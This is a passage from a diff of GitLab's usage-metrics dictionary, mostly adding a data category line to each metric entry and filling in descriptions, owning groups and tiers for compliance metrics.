review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9522,6 +11256,8 @@ Count of unique users per week who locked a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9534,6 +11270,8 @@ Count of unique users per month who unlocked a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9546,6 +11284,8 @@ Count of unique users per week who unlocked a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9558,6 +11298,8 @@ Count of unique users per month who publish their review as part of a merge requ Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9570,6 +11312,8 @@ Count of unique users per week who publish their review as part of a merge reque Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9582,6 +11326,8 @@ Count of unique users per month who removed a comment on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9594,6 +11340,8 @@ Count of unique users per month who removed a comment on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9606,6 +11354,8 @@ Count of unique users per month who remove a multiline comment in a merge reques Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9618,6 +11368,8 @@ Count of unique users per week who remove a multiline comment in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9630,6 +11382,8 @@ Count of unique users per month who reopened a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9642,6 +11396,8 @@ Count of unique users per week who reopened a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9654,6 +11410,8 @@ Count of unique users per week who attempt to resolve a conflict through the ui Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9666,6 +11424,8 @@ Count of unique users per week who attempt to resolve a conflict through the ui Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9678,6 +11438,8 @@ Count of unique users per month who resolve a thread in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9690,6 +11452,8 @@ Count of unique users per week who resolve a thread in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9702,6 +11466,8 @@ Count of unique users per month who request a review of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9714,6 +11480,8 @@ Count of unique users per week who request a review of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9726,6 +11494,8 @@ Count of unique users per month who changed reviewers of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9738,6 +11508,8 @@ Count of unique users per week who changed reviewers of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9750,6 +11522,8 @@ Count of unique users per month with diffs viewed file by file Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9762,6 +11536,8 @@ Count of unique users per week with diffs viewed file by file Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9774,6 +11550,8 @@ Count of unique users per month who changed time estimate of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9786,6 +11564,8 @@ Count of unique users per week who changed time estimate of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9798,6 +11578,8 @@ Count of unique users per month who changed time spent on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9810,6 +11592,8 @@ Count of unique users per week who changed time spent on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9822,6 +11606,8 @@ Count of unique users per month who toggled a task item in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9834,6 +11620,8 @@ Count of unique users per week who toggled a task item in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9846,6 +11634,8 @@ Count of unique users per month who unapprove a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9858,6 +11648,8 @@ Count of unique users per week who unapprove a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9870,6 +11662,8 @@ Count of unique users per month who unmark a merge request as a draft Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9882,6 +11676,8 @@ Count of unique users per week who unmark a merge request as a draft Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9894,6 +11690,8 @@ Count of unique users per month who unresolve a thread in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9906,6 +11704,8 @@ Count of unique users per week who unresolve a thread in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9918,6 +11718,8 @@ Count of unique users per month who use GitLab Workflow for VS Code Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9930,153 +11732,179 @@ Count of unique users per week who use GitLab Workflow for VS Code Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.compliance.a_compliance_audit_events_api_monthly` -Missing description +Unique users that have used the Audit Events API in a given month. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183942_a_compliance_audit_events_api_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183942_a_compliance_audit_events_api_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.a_compliance_audit_events_api_weekly` -Missing description +Unique users that have used the Audit Events API in a given week. [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183940_a_compliance_audit_events_api_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.compliance_total_unique_counts_monthly` -Missing description +Unique count of compliance actions in a given month -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183946_compliance_total_unique_counts_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183946_compliance_total_unique_counts_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.compliance_total_unique_counts_weekly` -Missing description +Unique count of compliance actions in a given week [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183944_compliance_total_unique_counts_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.g_compliance_audit_events_monthly` -Missing description +Unique users who have viewed the audit event screen in a given month. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183930_g_compliance_audit_events_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183930_g_compliance_audit_events_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.g_compliance_audit_events_weekly` -Missing description +Number of unique visitors to group-level audit events screen in a given week [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183928_g_compliance_audit_events_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.g_compliance_dashboard_monthly` -Missing description +Unique users who have viewed the compliance dashboard in a given month. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183926_g_compliance_dashboard_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183926_g_compliance_dashboard_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.g_compliance_dashboard_weekly` -Missing description +Unique users who have looked at the compliance dashboard in a given week [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183924_g_compliance_dashboard_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.i_compliance_audit_events_monthly` -Missing description +Unique users that have viewed the instance-level audit events screen -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183934_i_compliance_audit_events_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183934_i_compliance_audit_events_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.i_compliance_audit_events_weekly` -Missing description +Unique users that have viewed the instance-level audit events screen [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183932_i_compliance_audit_events_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `redis_hll_counters.compliance.i_compliance_credential_inventory_monthly` -Missing description +Unique users who have viewed the credential inventory in a given month. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183938_i_compliance_credential_inventory_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183938_i_compliance_credential_inventory_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `redis_hll_counters.compliance.i_compliance_credential_inventory_weekly` -Missing description +Unique visitors to the credential inventory screen in a given week [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183936_i_compliance_credential_inventory_weekly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `ultimate` ### `redis_hll_counters.deploy_token_packages.deploy_token_packages_total_unique_counts_monthly` @@ -10086,6 +11914,8 @@ A monthly count of packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10098,6 +11928,8 @@ A weekly count of packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10110,6 +11942,8 @@ A monthly count of Composer packages published to the registry using a deploy to Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10122,6 +11956,8 @@ A weekly count of Composer packages published to the registry using a deploy tok Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10134,6 +11970,8 @@ A monthly count of Conan packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10146,6 +11984,8 @@ A weekly count of Conan packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10158,6 +11998,8 @@ A monthly count of container images published to the registry using a deploy tok Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10170,6 +12012,8 @@ A weekly count of container images published to the registry using a deploy toke Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10182,6 +12026,8 @@ A monthly count of Debian packages published to the registry using a deploy toke Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10194,6 +12040,8 @@ A weekly count of Debian packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10206,6 +12054,8 @@ A monthly count of generic packages published to the registry using a deploy tok Group: `group::package` +Data Category: `Optional` + Status: `broken` Tiers: `free`, `premium`, `ultimate` @@ -10218,6 +12068,8 @@ A weekly count of generic packages published to the registry using a deploy toke Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10230,6 +12082,8 @@ A monthly count of Go modules published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10242,6 +12096,8 @@ A weekly count of Go modules published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10254,6 +12110,8 @@ Distinct Helm pakages deployed in recent 28 days Group: `group::package` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -10266,6 +12124,8 @@ Distinct Helm pakages deployed in recent 7 days Group: `group::package` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -10278,6 +12138,8 @@ A monthly count of Maven packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10290,6 +12152,8 @@ A weekly count of Maven packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10302,6 +12166,8 @@ A monthly count of npm packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10314,6 +12180,8 @@ A weekly count of npm packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10326,6 +12194,8 @@ A monthly count of NuGet packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10338,6 +12208,8 @@ A weekly count of NuGet packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10350,6 +12222,8 @@ A monthly count of PyPI packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10362,6 +12236,8 @@ A weekly count of Python packages published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10374,6 +12250,8 @@ Distinct count events for RubyGems packages published using a Deploy token in re Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10386,6 +12264,8 @@ A weekly count of distinct RubyGems packages published using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10398,6 +12278,8 @@ A monthly count of package tags published to the registry using a deploy token Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10410,6 +12292,8 @@ A weekly count of users that have published a package tag to the registry using Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -10422,6 +12306,8 @@ Number of distinct users authorized via deploy token creating Terraform Module p Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10434,6 +12320,8 @@ Number of distinct users authorized via deploy token creating Terraform Module p Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10446,6 +12334,8 @@ Number of users performing actions on Jira issues by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10458,6 +12348,8 @@ Number of users performing actions on Jira issues by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10470,6 +12362,8 @@ Number of users closing Jira issues by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10482,6 +12376,8 @@ Number of users closing Jira issues by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10494,6 +12390,8 @@ Number of users creating Jira issues by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10506,6 +12404,8 @@ Number of users creating Jira issues by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10518,6 +12418,8 @@ Number of users that cross-referenced Jira issues by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10530,6 +12432,8 @@ Number of users that cross-referenced Jira issues by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10542,6 +12446,8 @@ Count of Jira Issue List visits by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10554,6 +12460,8 @@ Count of Jira Issue List visits by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10566,6 +12474,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10578,6 +12488,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10590,6 +12502,8 @@ Calculated unique users to trigger a Slack message by creating a confidential no Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10602,6 +12516,8 @@ Calculated unique users to trigger a Slack message by creating a confidential no Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10614,6 +12530,8 @@ Calculated unique users to trigger a Slack message by performing a deployment by Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10626,6 +12544,8 @@ Calculated unique users to trigger a Slack message by performing a deployment by Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10638,6 +12558,8 @@ Calculated unique users to trigger a Slack message by performing an action on an Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10650,6 +12572,8 @@ Calculated unique users to trigger a Slack message by performing an action on an Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10662,6 +12586,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10674,6 +12600,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10686,6 +12614,8 @@ Calculated unique users to trigger a Slack message by creating a note by month Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10698,6 +12628,8 @@ Calculated unique users to trigger a Slack message by creating a note by week Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10710,6 +12642,8 @@ Calculated unique users to trigger a Slack message by performing a Git push by m Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10722,6 +12656,8 @@ Calculated unique users to trigger a Slack message by performing a Git push by w Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10734,6 +12670,8 @@ Calculated unique users to trigger a Slack message by performing a tag push by m Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10746,6 +12684,8 @@ Calculated unique users to trigger a Slack message by performing a tag push by w Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10758,6 +12698,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10770,6 +12712,8 @@ Calculated unique users to trigger a Slack message by performing an action on a Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -10782,6 +12726,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -10794,6 +12740,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -10806,6 +12754,8 @@ Count of MAU creating epic boards Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10818,6 +12768,8 @@ Count of WAU creating epic boards Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10830,6 +12782,8 @@ Count of MAU updating epic board names Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10842,6 +12796,8 @@ Count of WAU updating epic board names Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10854,6 +12810,8 @@ Count of MAU viewing epic boards Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10866,6 +12824,8 @@ Count of WAU viewing epic boards Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10878,6 +12838,8 @@ Total monthly users count for epics_usage Group: `group::product planning` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10890,6 +12852,8 @@ Total weekly users count for epics_usage Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10902,6 +12866,8 @@ Counts of MAU closing epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10914,6 +12880,8 @@ Counts of WAU closing epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10926,6 +12894,8 @@ Count of MAU creating epics Group: `group::product planning` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10938,6 +12908,8 @@ Count of WAU creating epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10950,6 +12922,8 @@ Count of MAU cross referencing epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10962,6 +12936,8 @@ Counts of WAU cross referencing epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10974,6 +12950,8 @@ Count of MAU destroying epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10986,6 +12964,8 @@ Count of WAU destroying epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -10998,6 +12978,8 @@ Count of MAU adding issues to epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11010,6 +12992,8 @@ Count of WAU adding issues to epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11022,6 +13006,8 @@ Counts of MAU moving epic issues between projects Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11034,6 +13020,8 @@ Counts of WAU moving epic issues between projects Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11046,6 +13034,8 @@ Count of MAU removing issues from epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11058,6 +13048,8 @@ Counts of WAU removing issues from epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11070,6 +13062,8 @@ Counts of MAU closing epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11082,6 +13076,8 @@ Counts of WAU re-opening epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11094,6 +13090,8 @@ Count of MAU chaging the epic lables Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11106,6 +13104,8 @@ Count of WAU chaging the epic lables Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11118,6 +13118,8 @@ Count of MAU promoting issues to epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11130,6 +13132,8 @@ Counts of WAU promoting issues to epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11142,6 +13146,8 @@ Counts of MAU awarding emoji on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11154,6 +13160,8 @@ Counts of WAU awarding emoji on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11166,6 +13174,8 @@ Counts of MAU adding epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11178,6 +13188,8 @@ Counts of WAU adding epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11190,6 +13202,8 @@ Counts of MAU destroying epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11202,6 +13216,8 @@ Counts of WAU destroying epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11214,6 +13230,8 @@ Number of users creating an issue from an epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium` @@ -11226,6 +13244,8 @@ Number of users creating an issue from an epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium` @@ -11238,6 +13258,8 @@ Counts of MAU removing emoji on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11250,6 +13272,8 @@ Counts of WAU removing emoji on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11262,6 +13286,8 @@ Count of MAU making epics confidential Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11274,6 +13300,8 @@ Count of WAU making epics confidential Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11286,6 +13314,8 @@ Counts of MAU setting epic due date as inherited Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11298,6 +13328,8 @@ Counts of WAU setting epic due date as fixed Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11310,6 +13342,8 @@ Counts of MAU setting epic due date as inherited Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11322,6 +13356,8 @@ Counts of WAU setting epic due date as inherited Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11334,6 +13370,8 @@ Counts of MAU setting epic start date as fixed Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11346,6 +13384,8 @@ Counts of WAU setting epic start date as fixed Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11358,6 +13398,8 @@ Counts of MAU setting epic start date as inherited Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11370,6 +13412,8 @@ Counts of WAU setting epic start date as inherited Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11382,6 +13426,8 @@ Count of MAU making epics visible Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11394,6 +13440,8 @@ Count of WAU making epics visible Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11406,6 